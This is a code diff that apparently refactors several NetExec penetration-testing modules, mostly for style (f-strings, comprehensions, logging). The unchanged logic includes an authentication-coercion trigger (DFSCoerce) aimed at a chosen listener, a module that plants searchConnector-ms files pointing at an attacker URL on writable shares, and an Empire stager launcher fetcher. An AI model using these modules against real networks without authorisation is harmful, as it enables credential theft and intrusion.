||||||
context.log.fail("User not found in LDAP: %s" % samname)
|
context.log.fail(f"User not found in LDAP: {samname}")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
# Attempts to resolve a SID and return the corresponding samaccountname
|
# Attempts to resolve a SID and return the corresponding samaccountname
|
||||||
# - sid : the SID to resolve
|
# - sid : the SID to resolve
|
||||||
def resolveSID(self, context, sid):
|
def resolveSID(self, context, sid):
|
||||||
# Tries to resolve the SID from the well known SIDs
|
# Tries to resolve the SID from the well known SIDs
|
||||||
if sid in WELL_KNOWN_SIDS.keys():
|
if sid in WELL_KNOWN_SIDS:
|
||||||
return WELL_KNOWN_SIDS[sid]
|
return WELL_KNOWN_SIDS[sid]
|
||||||
# Tries to resolve the SID from the LDAP domain dump
|
# Tries to resolve the SID from the LDAP domain dump
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
dn = self.ldap_session.search(
|
self.ldap_session.search(
|
||||||
searchBase=self.baseDN,
|
searchBase=self.baseDN,
|
||||||
searchFilter="(objectSid=%s)" % sid,
|
searchFilter=f"(objectSid={sid})",
|
||||||
attributes=["sAMAccountName"],
|
attributes=["sAMAccountName"],
|
||||||
)[
|
)[0][0]
|
||||||
0
|
return self.ldap_session.search(
|
||||||
][0]
|
|
||||||
samname = self.ldap_session.search(
|
|
||||||
searchBase=self.baseDN,
|
searchBase=self.baseDN,
|
||||||
searchFilter="(objectSid=%s)" % sid,
|
searchFilter=f"(objectSid={sid})",
|
||||||
attributes=["sAMAccountName"],
|
attributes=["sAMAccountName"],
|
||||||
)[0][
|
)[0][1][0][1][0]
|
||||||
1
|
except Exception:
|
||||||
][0][
|
context.log.debug(f"SID not found in LDAP: {sid}")
|
||||||
1
|
|
||||||
][0]
|
|
||||||
return samname
|
|
||||||
except Exception as e:
|
|
||||||
context.log.debug("SID not found in LDAP: %s" % sid)
|
|
||||||
return ""
|
return ""
|
||||||
|
|
||||||
# Parses a full DACL
|
# Parses a full DACL
|
||||||
|
@ -445,17 +439,12 @@ class NXCModule:
|
||||||
|
|
||||||
# Parses an access mask to extract the different values from a simple permission
|
# Parses an access mask to extract the different values from a simple permission
|
||||||
# https://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
|
# https://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
|
||||||
# - fsr : the access mask to parse
|
def parse_perms(self, access_mask):
|
||||||
def parse_perms(self, fsr):
|
perms = [PERM.name for PERM in SIMPLE_PERMISSIONS if (access_mask & PERM.value) == PERM.value]
|
||||||
_perms = []
|
# use bitwise NOT operator (~) and sum() function to clear the bits that have been processed
|
||||||
for PERM in SIMPLE_PERMISSIONS:
|
access_mask &= ~sum(PERM.value for PERM in SIMPLE_PERMISSIONS if (access_mask & PERM.value) == PERM.value)
|
||||||
if (fsr & PERM.value) == PERM.value:
|
perms += [PERM.name for PERM in ACCESS_MASK if access_mask & PERM.value]
|
||||||
_perms.append(PERM.name)
|
return perms
|
||||||
fsr = fsr & (not PERM.value)
|
|
||||||
for PERM in ACCESS_MASK:
|
|
||||||
if fsr & PERM.value:
|
|
||||||
_perms.append(PERM.name)
|
|
||||||
return _perms
|
|
||||||
|
|
||||||
# Parses a specified ACE and extract the different values (Flags, Access Mask, Trustee, ObjectType, InheritedObjectType)
|
# Parses a specified ACE and extract the different values (Flags, Access Mask, Trustee, ObjectType, InheritedObjectType)
|
||||||
# - ace : the ACE to parse
|
# - ace : the ACE to parse
|
||||||
|
@ -467,86 +456,59 @@ class NXCModule:
|
||||||
"ACCESS_DENIED_ACE",
|
"ACCESS_DENIED_ACE",
|
||||||
"ACCESS_DENIED_OBJECT_ACE",
|
"ACCESS_DENIED_OBJECT_ACE",
|
||||||
]:
|
]:
|
||||||
parsed_ace = {}
|
_ace_flags = [FLAG.name for FLAG in ACE_FLAGS if ace.hasFlag(FLAG.value)]
|
||||||
parsed_ace["ACE Type"] = ace["TypeName"]
|
parsed_ace = {"ACE Type": ace["TypeName"], "ACE flags": ", ".join(_ace_flags) or "None"}
|
||||||
# Retrieves ACE's flags
|
|
||||||
_ace_flags = []
|
|
||||||
for FLAG in ACE_FLAGS:
|
|
||||||
if ace.hasFlag(FLAG.value):
|
|
||||||
_ace_flags.append(FLAG.name)
|
|
||||||
parsed_ace["ACE flags"] = ", ".join(_ace_flags) or "None"
|
|
||||||
|
|
||||||
# For standard ACE
|
# For standard ACE
|
||||||
# Extracts the access mask (by parsing the simple permissions) and the principal's SID
|
# Extracts the access mask (by parsing the simple permissions) and the principal's SID
|
||||||
if ace["TypeName"] in ["ACCESS_ALLOWED_ACE", "ACCESS_DENIED_ACE"]:
|
if ace["TypeName"] in ["ACCESS_ALLOWED_ACE", "ACCESS_DENIED_ACE"]:
|
||||||
parsed_ace["Access mask"] = "%s (0x%x)" % (
|
access_mask = f"{', '.join(self.parse_perms(ace['Ace']['Mask']['Mask']))} (0x{ace['Ace']['Mask']['Mask']:x})"
|
||||||
", ".join(self.parse_perms(ace["Ace"]["Mask"]["Mask"])),
|
trustee_sid = f"{self.resolveSID(context, ace['Ace']['Sid'].formatCanonical()) or 'UNKNOWN'} ({ace['Ace']['Sid'].formatCanonical()})"
|
||||||
ace["Ace"]["Mask"]["Mask"],
|
parsed_ace = {
|
||||||
)
|
"Access mask": access_mask,
|
||||||
parsed_ace["Trustee (SID)"] = "%s (%s)" % (
|
"Trustee (SID)": trustee_sid
|
||||||
self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN",
|
}
|
||||||
ace["Ace"]["Sid"].formatCanonical(),
|
elif ace["TypeName"] in ["ACCESS_ALLOWED_OBJECT_ACE", "ACCESS_DENIED_OBJECT_ACE"]: # for object-specific ACE
|
||||||
)
|
|
||||||
|
|
||||||
# For object-specific ACE
|
|
||||||
elif ace["TypeName"] in [
|
|
||||||
"ACCESS_ALLOWED_OBJECT_ACE",
|
|
||||||
"ACCESS_DENIED_OBJECT_ACE",
|
|
||||||
]:
|
|
||||||
# Extracts the mask values. These values will indicate the ObjectType purpose
|
# Extracts the mask values. These values will indicate the ObjectType purpose
|
||||||
_access_mask_flags = []
|
access_mask_flags = [FLAG.name for FLAG in ALLOWED_OBJECT_ACE_MASK_FLAGS if ace["Ace"]["Mask"].hasPriv(FLAG.value)]
|
||||||
for FLAG in ALLOWED_OBJECT_ACE_MASK_FLAGS:
|
parsed_ace["Access mask"] = ", ".join(access_mask_flags)
|
||||||
if ace["Ace"]["Mask"].hasPriv(FLAG.value):
|
|
||||||
_access_mask_flags.append(FLAG.name)
|
|
||||||
parsed_ace["Access mask"] = ", ".join(_access_mask_flags)
|
|
||||||
# Extracts the ACE flag values and the trusted SID
|
# Extracts the ACE flag values and the trusted SID
|
||||||
_object_flags = []
|
object_flags = [FLAG.name for FLAG in OBJECT_ACE_FLAGS if ace["Ace"].hasFlag(FLAG.value)]
|
||||||
for FLAG in OBJECT_ACE_FLAGS:
|
parsed_ace["Flags"] = ", ".join(object_flags) or "None"
|
||||||
if ace["Ace"].hasFlag(FLAG.value):
|
|
||||||
_object_flags.append(FLAG.name)
|
|
||||||
parsed_ace["Flags"] = ", ".join(_object_flags) or "None"
|
|
||||||
# Extracts the ObjectType GUID values
|
# Extracts the ObjectType GUID values
|
||||||
if ace["Ace"]["ObjectTypeLen"] != 0:
|
if ace["Ace"]["ObjectTypeLen"] != 0:
|
||||||
obj_type = bin_to_string(ace["Ace"]["ObjectType"]).lower()
|
obj_type = bin_to_string(ace["Ace"]["ObjectType"]).lower()
|
||||||
try:
|
try:
|
||||||
parsed_ace["Object type (GUID)"] = "%s (%s)" % (
|
parsed_ace["Object type (GUID)"] = f"{OBJECT_TYPES_GUID[obj_type]} ({obj_type})"
|
||||||
OBJECT_TYPES_GUID[obj_type],
|
|
||||||
obj_type,
|
|
||||||
)
|
|
||||||
except KeyError:
|
except KeyError:
|
||||||
parsed_ace["Object type (GUID)"] = "UNKNOWN (%s)" % obj_type
|
parsed_ace["Object type (GUID)"] = f"UNKNOWN ({obj_type})"
|
||||||
# Extracts the InheritedObjectType GUID values
|
# Extracts the InheritedObjectType GUID values
|
||||||
if ace["Ace"]["InheritedObjectTypeLen"] != 0:
|
if ace["Ace"]["InheritedObjectTypeLen"] != 0:
|
||||||
inh_obj_type = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower()
|
inh_obj_type = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower()
|
||||||
try:
|
try:
|
||||||
parsed_ace["Inherited type (GUID)"] = "%s (%s)" % (
|
parsed_ace["Inherited type (GUID)"] = f"{OBJECT_TYPES_GUID[inh_obj_type]} ({inh_obj_type})"
|
||||||
OBJECT_TYPES_GUID[inh_obj_type],
|
|
||||||
inh_obj_type,
|
|
||||||
)
|
|
||||||
except KeyError:
|
except KeyError:
|
||||||
parsed_ace["Inherited type (GUID)"] = "UNKNOWN (%s)" % inh_obj_type
|
parsed_ace["Inherited type (GUID)"] = f"UNKNOWN ({inh_obj_type})"
|
||||||
# Extract the Trustee SID (the object that has the right over the DACL bearer)
|
# Extract the Trustee SID (the object that has the right over the DACL bearer)
|
||||||
parsed_ace["Trustee (SID)"] = "%s (%s)" % (
|
parsed_ace["Trustee (SID)"] = "{} ({})".format(
|
||||||
self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN",
|
self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN",
|
||||||
ace["Ace"]["Sid"].formatCanonical(),
|
ace["Ace"]["Sid"].formatCanonical(),
|
||||||
)
|
)
|
||||||
|
else: # if the ACE is not an access allowed
|
||||||
else:
|
context.log.debug(f"ACE Type ({ace['TypeName']}) unsupported for parsing yet, feel free to contribute")
|
||||||
# If the ACE is not an access allowed
|
_ace_flags = [FLAG.name for FLAG in ACE_FLAGS if ace.hasFlag(FLAG.value)]
|
||||||
context.log.debug("ACE Type (%s) unsupported for parsing yet, feel free to contribute" % ace["TypeName"])
|
parsed_ace = {
|
||||||
parsed_ace = {}
|
"ACE type": ace["TypeName"],
|
||||||
parsed_ace["ACE type"] = ace["TypeName"]
|
"ACE flags": ", ".join(_ace_flags) or "None",
|
||||||
_ace_flags = []
|
"DEBUG": "ACE type not supported for parsing by dacleditor.py, feel free to contribute",
|
||||||
for FLAG in ACE_FLAGS:
|
}
|
||||||
if ace.hasFlag(FLAG.value):
|
|
||||||
_ace_flags.append(FLAG.name)
|
|
||||||
parsed_ace["ACE flags"] = ", ".join(_ace_flags) or "None"
|
|
||||||
parsed_ace["DEBUG"] = "ACE type not supported for parsing by dacleditor.py, feel free to contribute"
|
|
||||||
return parsed_ace
|
return parsed_ace
|
||||||
|
|
||||||
# Prints a full DACL by printing each parsed ACE
|
|
||||||
# - parsed_dacl : a parsed DACL from parse_dacl()
|
|
||||||
def print_parsed_dacl(self, context, parsed_dacl):
|
def print_parsed_dacl(self, context, parsed_dacl):
|
||||||
|
"""Prints a full DACL by printing each parsed ACE
|
||||||
|
|
||||||
|
parsed_dacl : a parsed DACL from parse_dacl()
|
||||||
|
"""
|
||||||
context.log.debug("Printing parsed DACL")
|
context.log.debug("Printing parsed DACL")
|
||||||
i = 0
|
i = 0
|
||||||
# If a specific right or a specific GUID has been specified, only the ACE with this right will be printed
|
# If a specific right or a specific GUID has been specified, only the ACE with this right will be printed
|
||||||
|
@ -554,6 +516,8 @@ class NXCModule:
|
||||||
# If a principal has been specified, only the ACE where he is the trustee will be printed
|
# If a principal has been specified, only the ACE where he is the trustee will be printed
|
||||||
for parsed_ace in parsed_dacl:
|
for parsed_ace in parsed_dacl:
|
||||||
print_ace = True
|
print_ace = True
|
||||||
|
context.log.debug(f"{parsed_ace=}, {self.rights=}, {self.rights_guid=}, {self.ace_type=}, {self.principal_sid=}")
|
||||||
|
|
||||||
# Filter on specific rights
|
# Filter on specific rights
|
||||||
if self.rights is not None:
|
if self.rights is not None:
|
||||||
try:
|
try:
|
||||||
|
@ -566,7 +530,7 @@ class NXCModule:
|
||||||
if (self.rights == "ResetPassword") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.ResetPassword.value not in parsed_ace["Object type (GUID)"])):
|
if (self.rights == "ResetPassword") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.ResetPassword.value not in parsed_ace["Object type (GUID)"])):
|
||||||
print_ace = False
|
print_ace = False
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
|
context.log.debug(f"Error filtering with {parsed_ace=} and {self.rights=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||||
|
|
||||||
# Filter on specific right GUID
|
# Filter on specific right GUID
|
||||||
if self.rights_guid is not None:
|
if self.rights_guid is not None:
|
||||||
|
@ -574,7 +538,7 @@ class NXCModule:
|
||||||
if ("Object type (GUID)" not in parsed_ace) or (self.rights_guid not in parsed_ace["Object type (GUID)"]):
|
if ("Object type (GUID)" not in parsed_ace) or (self.rights_guid not in parsed_ace["Object type (GUID)"]):
|
||||||
print_ace = False
|
print_ace = False
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
|
context.log.debug(f"Error filtering with {parsed_ace=} and {self.rights_guid=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||||
|
|
||||||
# Filter on ACE type
|
# Filter on ACE type
|
||||||
if self.ace_type == "allowed":
|
if self.ace_type == "allowed":
|
||||||
|
@ -582,13 +546,13 @@ class NXCModule:
|
||||||
if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"]):
|
if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"]):
|
||||||
print_ace = False
|
print_ace = False
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
|
context.log.debug(f"Error filtering with {parsed_ace=} and {self.ace_type=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"]):
|
if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"]):
|
||||||
print_ace = False
|
print_ace = False
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
|
context.log.debug(f"Error filtering with {parsed_ace=} and {self.ace_type=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||||
|
|
||||||
# Filter on trusted principal
|
# Filter on trusted principal
|
||||||
if self.principal_sid is not None:
|
if self.principal_sid is not None:
|
||||||
|
@ -596,7 +560,7 @@ class NXCModule:
|
||||||
if self.principal_sid not in parsed_ace["Trustee (SID)"]:
|
if self.principal_sid not in parsed_ace["Trustee (SID)"]:
|
||||||
print_ace = False
|
print_ace = False
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e)
|
context.log.debug(f"Error filtering with {parsed_ace=} and {self.principal_sid=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||||
if print_ace:
|
if print_ace:
|
||||||
self.context.log.highlight("%-28s" % "ACE[%d] info" % i)
|
self.context.log.highlight("%-28s" % "ACE[%d] info" % i)
|
||||||
self.print_parsed_ace(parsed_ace)
|
self.print_parsed_ace(parsed_ace)
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket import system_errors
|
from impacket import system_errors
|
||||||
from impacket.dcerpc.v5 import transport
|
from impacket.dcerpc.v5 import transport
|
||||||
from impacket.dcerpc.v5.ndr import NDRCALL
|
from impacket.dcerpc.v5.ndr import NDRCALL
|
||||||
|
@ -23,9 +20,7 @@ class NXCModule:
|
||||||
self.listener = None
|
self.listener = None
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""LISTENER Listener Address (defaults to 127.0.0.1)"""
|
||||||
LISTENER Listener Address (defaults to 127.0.0.1)
|
|
||||||
"""
|
|
||||||
self.listener = "127.0.0.1"
|
self.listener = "127.0.0.1"
|
||||||
if "LISTENER" in module_options:
|
if "LISTENER" in module_options:
|
||||||
self.listener = module_options["LISTENER"]
|
self.listener = module_options["LISTENER"]
|
||||||
|
@ -64,13 +59,9 @@ class DCERPCSessionError(DCERPCException):
|
||||||
if key in system_errors.ERROR_MESSAGES:
|
if key in system_errors.ERROR_MESSAGES:
|
||||||
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
|
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
|
||||||
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
|
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
|
||||||
return "DFSNM SessionError: code: 0x%x - %s - %s" % (
|
return f"DFSNM SessionError: code: 0x{self.error_code:x} - {error_msg_short} - {error_msg_verbose}"
|
||||||
self.error_code,
|
|
||||||
error_msg_short,
|
|
||||||
error_msg_verbose,
|
|
||||||
)
|
|
||||||
else:
|
else:
|
||||||
return "DFSNM SessionError: unknown error code: 0x%x" % self.error_code
|
return f"DFSNM SessionError: unknown error code: 0x{self.error_code:x}"
|
||||||
|
|
||||||
|
|
||||||
################################################################################
|
################################################################################
|
||||||
|
@ -119,21 +110,20 @@ class TriggerAuth:
|
||||||
if doKerberos:
|
if doKerberos:
|
||||||
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||||
# if target:
|
# if target:
|
||||||
# rpctransport.setRemoteHost(target)
|
|
||||||
|
|
||||||
rpctransport.setRemoteHost(target)
|
rpctransport.setRemoteHost(target)
|
||||||
dce = rpctransport.get_dce_rpc()
|
dce = rpctransport.get_dce_rpc()
|
||||||
nxc_logger.debug("[-] Connecting to %s" % r"ncacn_np:%s[\PIPE\netdfs]" % target)
|
nxc_logger.debug("[-] Connecting to {}".format(r"ncacn_np:%s[\PIPE\netdfs]") % target)
|
||||||
try:
|
try:
|
||||||
dce.connect()
|
dce.connect()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
|
nxc_logger.debug(f"Something went wrong, check error status => {e!s}")
|
||||||
return
|
return None
|
||||||
try:
|
try:
|
||||||
dce.bind(uuidtup_to_bin(("4FC742E0-4A10-11CF-8273-00AA004AE673", "3.0")))
|
dce.bind(uuidtup_to_bin(("4FC742E0-4A10-11CF-8273-00AA004AE673", "3.0")))
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
|
nxc_logger.debug(f"Something went wrong, check error status => {e!s}")
|
||||||
return
|
return None
|
||||||
nxc_logger.debug("[+] Successfully bound!")
|
nxc_logger.debug("[+] Successfully bound!")
|
||||||
return dce
|
return dce
|
||||||
|
|
||||||
|
@ -141,13 +131,12 @@ class TriggerAuth:
|
||||||
nxc_logger.debug("[-] Sending NetrDfsRemoveStdRoot!")
|
nxc_logger.debug("[-] Sending NetrDfsRemoveStdRoot!")
|
||||||
try:
|
try:
|
||||||
request = NetrDfsRemoveStdRoot()
|
request = NetrDfsRemoveStdRoot()
|
||||||
request["ServerName"] = "%s\x00" % listener
|
request["ServerName"] = f"{listener}\x00"
|
||||||
request["RootShare"] = "test\x00"
|
request["RootShare"] = "test\x00"
|
||||||
request["ApiFlags"] = 1
|
request["ApiFlags"] = 1
|
||||||
if self.args.verbose:
|
if self.args.verbose:
|
||||||
nxc_logger.debug(request.dump())
|
nxc_logger.debug(request.dump())
|
||||||
# logger.debug(request.dump())
|
dce.request(request)
|
||||||
resp = dce.request(request)
|
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
nxc_logger.debug(e)
|
nxc_logger.debug(e)
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import ntpath
|
import ntpath
|
||||||
import tempfile
|
import tempfile
|
||||||
|
|
||||||
|
@ -47,22 +44,21 @@ class NXCModule:
|
||||||
self.file_path = ntpath.join("\\", f"{self.filename}.searchConnector-ms")
|
self.file_path = ntpath.join("\\", f"{self.filename}.searchConnector-ms")
|
||||||
if not self.cleanup:
|
if not self.cleanup:
|
||||||
self.scfile_path = f"{tempfile.gettempdir()}/{self.filename}.searchConnector-ms"
|
self.scfile_path = f"{tempfile.gettempdir()}/{self.filename}.searchConnector-ms"
|
||||||
scfile = open(self.scfile_path, "w")
|
with open(self.scfile_path, "w") as scfile:
|
||||||
scfile.truncate(0)
|
scfile.truncate(0)
|
||||||
scfile.write('<?xml version="1.0" encoding="UTF-8"?>')
|
scfile.write('<?xml version="1.0" encoding="UTF-8"?>')
|
||||||
scfile.write("<searchConnectorDescription" ' xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">')
|
scfile.write("<searchConnectorDescription" ' xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">') # noqa ISC001
|
||||||
scfile.write("<description>Microsoft Outlook</description>")
|
scfile.write("<description>Microsoft Outlook</description>")
|
||||||
scfile.write("<isSearchOnlyItem>false</isSearchOnlyItem>")
|
scfile.write("<isSearchOnlyItem>false</isSearchOnlyItem>")
|
||||||
scfile.write("<includeInStartMenuScope>true</includeInStartMenuScope>")
|
scfile.write("<includeInStartMenuScope>true</includeInStartMenuScope>")
|
||||||
scfile.write(f"<iconReference>{self.url}/0001.ico</iconReference>")
|
scfile.write(f"<iconReference>{self.url}/0001.ico</iconReference>")
|
||||||
scfile.write("<templateInfo>")
|
scfile.write("<templateInfo>")
|
||||||
scfile.write("<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>")
|
scfile.write("<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>")
|
||||||
scfile.write("</templateInfo>")
|
scfile.write("</templateInfo>")
|
||||||
scfile.write("<simpleLocation>")
|
scfile.write("<simpleLocation>")
|
||||||
scfile.write("<url>{}</url>".format(self.url))
|
scfile.write(f"<url>{self.url}</url>")
|
||||||
scfile.write("</simpleLocation>")
|
scfile.write("</simpleLocation>")
|
||||||
scfile.write("</searchConnectorDescription>")
|
scfile.write("</searchConnectorDescription>")
|
||||||
scfile.close()
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
shares = connection.shares()
|
shares = connection.shares()
|
||||||
|
@ -74,13 +70,12 @@ class NXCModule:
|
||||||
with open(self.scfile_path, "rb") as scfile:
|
with open(self.scfile_path, "rb") as scfile:
|
||||||
try:
|
try:
|
||||||
connection.conn.putFile(share["name"], self.file_path, scfile.read)
|
connection.conn.putFile(share["name"], self.file_path, scfile.read)
|
||||||
context.log.success(f"[OPSEC] Created {self.filename}.searchConnector-ms" f" file on the {share['name']} share")
|
context.log.success(f"[OPSEC] Created {self.filename}.searchConnector-ms file on the {share['name']} share")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.exception(e)
|
context.log.fail(f"Error writing {self.filename}.searchConnector-ms file on the {share['name']} share: {e}")
|
||||||
context.log.fail(f"Error writing {self.filename}.searchConnector-ms file" f" on the {share['name']} share: {e}")
|
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
connection.conn.deleteFile(share["name"], self.file_path)
|
connection.conn.deleteFile(share["name"], self.file_path)
|
||||||
context.log.success(f"Deleted {self.filename}.searchConnector-ms file on the" f" {share['name']} share")
|
context.log.success(f"Deleted {self.filename}.searchConnector-ms file on the {share['name']} share")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"[OPSEC] Error deleting {self.filename}.searchConnector-ms" f" file on share {share['name']}: {e}")
|
context.log.fail(f"[OPSEC] Error deleting {self.filename}.searchConnector-ms file on share {share['name']}: {e}")
|
||||||
|
|
|
@ -1,15 +1,7 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
import requests
|
import requests
|
||||||
from requests import ConnectionError
|
from requests import ConnectionError
|
||||||
|
|
||||||
# The following disables the InsecureRequests warning and the 'Starting new HTTPS connection' log message
|
|
||||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
|
||||||
|
|
||||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""
|
||||||
|
@ -38,7 +30,7 @@ class NXCModule:
|
||||||
|
|
||||||
api_proto = "https" if "SSL" in module_options else "http"
|
api_proto = "https" if "SSL" in module_options else "http"
|
||||||
|
|
||||||
obfuscate = True if "OBFUSCATE" in module_options else False
|
obfuscate = "OBFUSCATE" in module_options
|
||||||
# we can use commands instead of backslashes - this is because Linux and OSX treat them differently
|
# we can use commands instead of backslashes - this is because Linux and OSX treat them differently
|
||||||
default_obfuscation = "Token,All,1"
|
default_obfuscation = "Token,All,1"
|
||||||
obfuscate_cmd = module_options["OBFUSCATE_CMD"] if "OBFUSCATE_CMD" in module_options else default_obfuscation
|
obfuscate_cmd = module_options["OBFUSCATE_CMD"] if "OBFUSCATE_CMD" in module_options else default_obfuscation
|
||||||
|
@ -100,7 +92,7 @@ class NXCModule:
|
||||||
verify=False,
|
verify=False,
|
||||||
)
|
)
|
||||||
except ConnectionError:
|
except ConnectionError:
|
||||||
context.log.fail(f"Unable to request stager from Empire's RESTful API")
|
context.log.fail("Unable to request stager from Empire's RESTful API")
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if stager_response.status_code not in [200, 201]:
|
if stager_response.status_code not in [200, 201]:
|
||||||
|
@ -111,7 +103,6 @@ class NXCModule:
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
context.log.debug(f"Response Code: {stager_response.status_code}")
|
context.log.debug(f"Response Code: {stager_response.status_code}")
|
||||||
# context.log.debug(f"Response Content: {stager_response.text}")
|
|
||||||
|
|
||||||
stager_create_data = stager_response.json()
|
stager_create_data = stager_response.json()
|
||||||
context.log.debug(f"Stager data: {stager_create_data}")
|
context.log.debug(f"Stager data: {stager_create_data}")
|
||||||
|
@ -123,14 +114,13 @@ class NXCModule:
|
||||||
verify=False,
|
verify=False,
|
||||||
)
|
)
|
||||||
context.log.debug(f"Response Code: {download_response.status_code}")
|
context.log.debug(f"Response Code: {download_response.status_code}")
|
||||||
# context.log.debug(f"Response Content: {download_response.text}")
|
|
||||||
|
|
||||||
self.empire_launcher = download_response.text
|
self.empire_launcher = download_response.text
|
||||||
|
|
||||||
if download_response.status_code == 200:
|
if download_response.status_code == 200:
|
||||||
context.log.success(f"Successfully generated launcher for listener '{module_options['LISTENER']}'")
|
context.log.success(f"Successfully generated launcher for listener '{module_options['LISTENER']}'")
|
||||||
else:
|
else:
|
||||||
context.log.fail(f"Something went wrong when retrieving stager Powershell command")
|
context.log.fail("Something went wrong when retrieving stager Powershell command")
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
if self.empire_launcher:
|
if self.empire_launcher:
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
# All credit to @an0n_r0
|
# All credit to @an0n_r0
|
||||||
# https://github.com/tothi/serviceDetector
|
# https://github.com/tothi/serviceDetector
|
||||||
# Module by @mpgn_x64
|
# Module by @mpgn_x64
|
||||||
|
@ -30,7 +27,6 @@ class NXCModule:
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""
|
||||||
"""
|
"""
|
||||||
pass
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
target = self._get_target(connection)
|
target = self._get_target(connection)
|
||||||
|
@ -62,15 +58,14 @@ class NXCModule:
|
||||||
|
|
||||||
dce, _ = lsa.connect()
|
dce, _ = lsa.connect()
|
||||||
policyHandle = lsa.open_policy(dce)
|
policyHandle = lsa.open_policy(dce)
|
||||||
|
try:
|
||||||
for product in conf["products"]:
|
for product in conf["products"]:
|
||||||
for service in product["services"]:
|
for service in product["services"]:
|
||||||
try:
|
|
||||||
lsa.LsarLookupNames(dce, policyHandle, service["name"])
|
lsa.LsarLookupNames(dce, policyHandle, service["name"])
|
||||||
context.log.info(f"Detected installed service on {connection.host}: {product['name']} {service['description']}")
|
context.log.info(f"Detected installed service on {connection.host}: {product['name']} {service['description']}")
|
||||||
results.setdefault(product["name"], {"services": []})["services"].append(service)
|
results.setdefault(product["name"], {"services": []})["services"].append(service)
|
||||||
except:
|
except Exception:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(str(e))
|
context.log.fail(str(e))
|
||||||
|
@ -93,7 +88,7 @@ class NXCModule:
|
||||||
|
|
||||||
def dump_results(self, results, remoteName, context):
|
def dump_results(self, results, remoteName, context):
|
||||||
if not results:
|
if not results:
|
||||||
